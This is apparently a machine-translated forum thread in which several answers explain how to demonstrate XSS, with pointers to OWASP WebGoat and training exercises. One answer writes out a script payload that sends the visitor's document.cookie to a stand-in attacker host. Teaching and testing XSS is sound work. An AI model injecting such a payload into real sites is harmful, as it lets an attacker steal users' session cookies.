2012-03-06 7 views

Odpowiedz

5

Zazwyczaj będziesz musiał zainstalować własne oprogramowanie po stronie serwera dla przykładu XSS na żywo. Niewiele legalnych witryn będzie celowo otwierać lukę XSS dla internautów.

Jednym z gotowych programów po stronie serwera, które pozwalają zademonstrować XSS (wśród wielu innych rzeczy) jest WebGoat OWASP. Oto instructions to install WebGoat and demonstrate XSS. Znajdziesz dodatkowe przykłady fragmentów programów, które umożliwiają XSS w artykule OWASP "Cross-site scripting (XSS)".

5

<img src="javascript:alert('hello everybody')"></img> Zmontowany znacznik obrazu jest przykładem xss. powyższy src zawiera skrypt ostrzegawczy java.

+2

To nic nie robi !? –

0

Prosty formularz będzie również: Jeśli pojawi się okno komunikatu, wiesz, że strona lub serwer jest podatny na ataki.

<script>window.location = 'haxxed.com? cookie=' + document.cookie</script> 

Wielki próbka jak działa technika można znaleźć tutaj https://www.hacksplaining.com/exercises/xss-stored